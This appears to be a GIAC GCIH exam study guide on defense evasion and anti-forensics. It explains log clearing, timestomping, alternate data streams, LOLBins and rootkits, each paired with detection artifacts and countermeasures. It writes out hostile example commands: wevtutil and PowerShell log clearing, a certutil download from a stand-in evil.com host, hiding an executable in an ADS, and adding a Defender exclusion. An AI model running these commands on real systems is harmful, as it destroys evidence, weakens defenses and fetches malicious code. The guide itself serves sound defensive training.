Defense Evasion and Anti-Forensics: A Comprehensive Guide for GIAC GCIH Exam Preparation
Why Defense Evasion and Anti-Forensics Matter
Defense evasion and anti-forensics represent some of the most critical topics in incident handling and cybersecurity. Attackers who successfully compromise a system don't simply stop after gaining access — they actively work to remain undetected, persist in the environment, and destroy or manipulate evidence of their activities. Understanding these techniques is essential for incident handlers because:
• Detection depends on knowing what to look for: If you don't understand how attackers hide, you cannot effectively find them.
• Incident response quality hinges on forensic integrity: Anti-forensic techniques can render an investigation incomplete or misleading.
• Organizations lose millions when attackers dwell undetected for extended periods — the average dwell time is still measured in weeks or months.
• The GCIH exam heavily tests your ability to recognize, describe, and counter these techniques as part of the post-exploitation phase of an attack.
What Is Defense Evasion?Defense evasion refers to any technique an attacker uses to avoid detection by security tools, analysts, or automated systems. This maps directly to the
MITRE ATT&CK Tactic TA0005 (Defense Evasion), which contains dozens of documented techniques. The goal is to allow the attacker to maintain access, move laterally, and accomplish objectives without triggering alerts or being discovered.
Common categories of defense evasion include:
•
Disabling or modifying security tools (antivirus, EDR, firewalls)
•
Obfuscation of malicious code or commands
•
Living off the land (LOLBins) — using legitimate system tools for malicious purposes
•
Process injection — hiding malicious code within legitimate processes
•
Masquerading — renaming malicious files to look like legitimate ones
•
Timestomping — altering file timestamps to blend in
•
Signed binary proxy execution — using trusted, signed binaries to execute malicious code
•
Indicator removal — clearing logs, deleting artifacts
What Is Anti-Forensics?Anti-forensics is a subset of defense evasion specifically aimed at undermining forensic investigation. While defense evasion focuses on avoiding real-time detection, anti-forensics focuses on
destroying, hiding, or manipulating evidence so that even after an attack is suspected, investigators cannot reconstruct what happened.
The key goals of anti-forensics are:
•
Evidence destruction: Deleting logs, wiping disk sectors, clearing browser history
•
Evidence hiding: Using steganography, alternate data streams (ADS), slack space, or encrypted containers
•
Evidence tampering: Modifying timestamps, altering log entries, changing file metadata
•
Trail obfuscation: Using proxies, VPNs, Tor, or compromised third-party systems to obscure the origin of attacks
•
Undermining forensic tools: Crafting data that causes forensic tools to crash or produce incorrect results
How Defense Evasion Works — Key Techniques in Detail1. Log Clearing and ManipulationAttackers frequently target system logs to remove evidence of their activities. On Windows, this involves clearing the Security, System, and Application event logs using commands like:
wevtutil cl Securitywevtutil cl Systemwevtutil cl ApplicationOr using PowerShell:
Clear-EventLog -LogName SecurityOn Linux, attackers may truncate or delete
/var/log/auth.log,
/var/log/syslog,
/var/log/wtmp,
/var/log/btmp, and
.bash_history. They may also use
shred to securely overwrite log files.
Exam Tip: Know that Windows Event ID
1102 indicates the Security log was cleared, and Event ID
104 indicates the System log was cleared. These are critical artifacts that survive even after log clearing because they are generated
by the act of clearing itself.
2. TimestompingTimestomping involves modifying the
$STANDARD_INFORMATION attribute timestamps in NTFS (Created, Modified, Accessed, Entry Modified — also known as MACE times). Tools like
Timestomp (from the Metasploit Framework) allow attackers to change these values to make malicious files appear as if they were created long ago.
Key Defense: The
$FILE_NAME attribute in the MFT (Master File Table) also stores timestamps and is much harder for attackers to modify. Forensic analysts compare $STANDARD_INFORMATION and $FILE_NAME timestamps — discrepancies indicate timestomping.
Exam Tip: Remember that $STANDARD_INFORMATION timestamps are easily modified, but $FILE_NAME timestamps are not typically modified by standard timestomping tools. This comparison is a key forensic detection method.
3. Alternate Data Streams (ADS)NTFS supports Alternate Data Streams, which allow data to be hidden within a file without changing the file's apparent size. An attacker could hide a malicious payload in an ADS:
type malware.exe > innocentfile.txt:hidden.exeThe hidden stream is not visible through normal directory listings. Detection requires tools like
streams.exe (Sysinternals) or
dir /r.
4. Process InjectionAttackers inject malicious code into legitimate processes to evade detection. Common techniques include:
•
DLL Injection: Forcing a legitimate process to load a malicious DLL
•
Process Hollowing: Creating a legitimate process in a suspended state, replacing its memory with malicious code, then resuming it
•
Reflective DLL Injection: Loading a DLL from memory without touching disk
•
Thread Execution Hijacking: Injecting code into an existing thread of a running process
Exam Tip: Process injection allows malicious code to run under the context of a trusted process (like
svchost.exe or
explorer.exe), making it harder for security tools to flag the activity as malicious.
5. Living Off the Land Binaries (LOLBins)Attackers use legitimate system binaries to execute malicious actions, avoiding the need to drop custom malware. Key examples include:
•
PowerShell: Downloading and executing payloads in memory
•
certutil.exe: Downloading files (
certutil -urlcache -split -f http://evil.com/payload.exe)
•
mshta.exe: Executing HTA files containing malicious scripts
•
regsvr32.exe: Executing scriptlets from remote URLs (Squiblydoo attack)
•
rundll32.exe: Executing malicious DLLs
•
wmic.exe: Process creation, lateral movement
•
bitsadmin.exe: Downloading files in the background
Exam Tip: The GCIH exam may present scenarios where these tools are used. You should be able to identify when a legitimate tool is being abused for malicious purposes.
6. Disabling Security ToolsAttackers may attempt to:
• Stop antivirus or EDR services
• Unload Sysmon drivers
• Modify Windows Defender exclusions via PowerShell:
Set-MpPreference -ExclusionPath 'C:\malware'• Kill security processes using tools like
Process Hacker or custom kernel drivers
• Tamper with ETW (Event Tracing for Windows) to blind security tools
7. Encryption and PackingMalware authors use packers, crypters, and custom encryption to evade signature-based detection. Packed malware appears different to every AV engine because the binary is compressed or encrypted, and the actual malicious code is only revealed at runtime in memory.
8. Fileless MalwareFileless techniques execute entirely in memory without writing malicious files to disk. This includes:
• PowerShell-based attacks using
Invoke-Expression or
IEX• WMI event subscriptions for persistence
• Registry-resident malware
• Malicious macros that execute shellcode directly in memory
Exam Tip: Fileless malware is harder to detect with traditional AV and leaves fewer forensic artifacts. Memory forensics (using tools like
Volatility) becomes essential.
9. RootkitsRootkits operate at a deep level (kernel-level or firmware-level) to hide the presence of malware. They can:
• Hide processes from task managers
• Hide files from directory listings
• Hide network connections from netstat
• Intercept and modify system calls
User-mode rootkits hook API calls in user space, while kernel-mode rootkits modify kernel structures (e.g., DKOM — Direct Kernel Object Manipulation).
10. SteganographyAttackers can hide data (commands, exfiltrated data, malware payloads) within image files, audio files, or other media. This allows covert communication channels that are extremely difficult to detect without specialized tools.
11. Secure Deletion and Disk WipingTools like
sdelete (Sysinternals),
cipher /w,
shred (Linux), and
BleachBit can securely overwrite deleted data to prevent recovery. Attackers may also use
dd on Linux to overwrite specific disk areas.
How Anti-Forensics Impacts Incident ResponseAnti-forensics directly challenges every phase of the forensic process:
•
Identification: If logs are cleared, identifying that an incident occurred becomes harder
•
Preservation: If evidence is being actively destroyed, the window for collection narrows
•
Analysis: Tampered timestamps and manipulated artifacts lead investigators astray
•
Reporting: Gaps in evidence make it difficult to build a complete timeline or support legal proceedings
Countermeasures and Detection StrategiesUnderstanding defenses is just as important for the GCIH exam:
•
Centralized logging (SIEM): Forward logs to a remote, hardened log server so attackers cannot destroy them by clearing local logs
•
File integrity monitoring (FIM): Detect unauthorized changes to critical files and configurations
•
MFT analysis: Compare $STANDARD_INFORMATION and $FILE_NAME timestamps to detect timestomping
•
Memory forensics: Use tools like Volatility to detect process injection, fileless malware, and rootkits
•
Behavioral detection (EDR): Monitor for suspicious process behavior rather than relying solely on signatures
•
Application whitelisting: Restrict which binaries can execute, limiting LOLBin abuse
•
Script block logging and module logging: Enable PowerShell logging (Event IDs 4103, 4104) to capture obfuscated commands
•
Sysmon: Deploy Sysmon with detailed configurations to capture process creation, network connections, file creation timestamps, and more
•
Network monitoring: Detect unusual outbound connections, DNS tunneling, and other covert channels
•
Volume Shadow Copies: Check VSS for previous versions of files that attackers may have modified or deleted
Exam Tips: Answering Questions on Defense Evasion and Anti-Forensics1. Know the MITRE ATT&CK Framework MappingThe GCIH exam often frames questions using real-world scenarios. Being able to map an activity to a MITRE ATT&CK technique (e.g., T1070 — Indicator Removal on Host, T1055 — Process Injection, T1036 — Masquerading) will help you quickly identify the correct answer.
2. Focus on Detection ArtifactsExam questions frequently ask:
"What evidence would indicate that [evasion technique] was used?" Prepare by memorizing key indicators:
• Log clearing → Event ID 1102 (Security), Event ID 104 (System)
• Timestomping → Mismatch between $STANDARD_INFORMATION and $FILE_NAME
• Process injection → Unexpected DLLs loaded, memory anomalies
• PowerShell abuse → Event IDs 4103, 4104 (Script Block Logging)
• ADS usage →
dir /r or
streams.exe showing hidden streams
3. Understand the Attacker's GoalWhen reading a scenario, ask yourself:
Is the attacker trying to avoid real-time detection (defense evasion) or destroy/hide evidence after the fact (anti-forensics)? This distinction helps you select the most appropriate answer.
4. Remember the Forensic Countermeasure for Each TechniqueThe exam often pairs an evasion technique with its forensic counter:
• Log clearing → Centralized logging / SIEM
• Timestomping → MFT analysis ($FILE_NAME attribute)
• Fileless malware → Memory forensics (Volatility)
• Rootkits → Boot from trusted media, integrity checking
• Secure deletion → Volume Shadow Copies, backup analysis
• Encrypted communications → Network metadata analysis, SSL/TLS inspection
5. Know Your ToolsBe familiar with both attacker tools and defender tools:
•
Attacker tools: Metasploit (timestomp, meterpreter), Mimikatz, PsExec, Cobalt Strike, BleachBit
•
Defender tools: Volatility, Sysmon, Autoruns, Process Monitor, FTK, EnCase, Wireshark, Zeek
6. Practice Scenario-Based ReasoningThe GCIH exam is scenario-heavy. You might see something like:
"An analyst notices that several security event logs are empty, but Event ID 1102 is present in the Security log. What does this indicate?" The answer is that the logs were deliberately cleared by an attacker (or compromised account). Practice mapping observations to conclusions.
7. Pay Attention to the Kill Chain PhaseDefense evasion and anti-forensics occur during the
post-exploitation phase. If a question describes activity
after initial access has been achieved, think about evasion and persistence techniques.
8. Don't Confuse Similar Techniques•
Timestomping changes timestamps;
log tampering modifies log content
•
Process injection hides in legitimate processes;
masquerading renames files to look legitimate
•
Encryption protects data in transit/at rest;
obfuscation makes code harder to analyze
•
Rootkits hide at the OS level;
fileless malware avoids disk but may not hide at the kernel level
9. Index Your Materials EffectivelyFor the GCIH exam (which is open book), create index entries for:
• Each major evasion technique with a brief description
• Detection methods and associated Event IDs
• Tool names (both offensive and defensive)
• MITRE ATT&CK technique IDs for quick reference
10. Time ManagementDefense evasion questions can be wordy with detailed scenarios. Read the question carefully, identify the key indicator or behavior described, and match it to the technique. Don't overthink — the GCIH exam rewards practical knowledge over theoretical depth.
Summary Table: Quick Reference for Exam DayTechnique → Detection Method → Key ArtifactLog Clearing → SIEM / Event ID 1102, 104 → Empty logs with clearing event present
Timestomping → MFT Analysis → $SI vs $FN timestamp mismatch
ADS → dir /r, streams.exe → Hidden data streams in NTFS
Process Injection → Memory forensics, EDR → Unexpected code in legitimate processes
LOLBins → Command-line logging, Sysmon → Legitimate tools with suspicious arguments
Fileless Malware → Memory forensics, PowerShell logging → Event IDs 4103/4104, memory artifacts
Rootkits → Integrity checking, trusted boot media → Hidden processes/files/connections
Secure Deletion → VSS, backup analysis → Missing expected files, overwrite patterns
Steganography → Steganalysis tools → Anomalous file sizes, statistical analysis
Disabling Security → Service monitoring, tamper protection → Stopped services, modified configurations
Final Thought: Defense evasion and anti-forensics questions on the GCIH exam test your ability to think like both an attacker and a defender. Master the techniques, know the artifacts they leave behind (or try to destroy), and understand the countermeasures. This dual perspective is the key to answering these questions confidently and correctly.
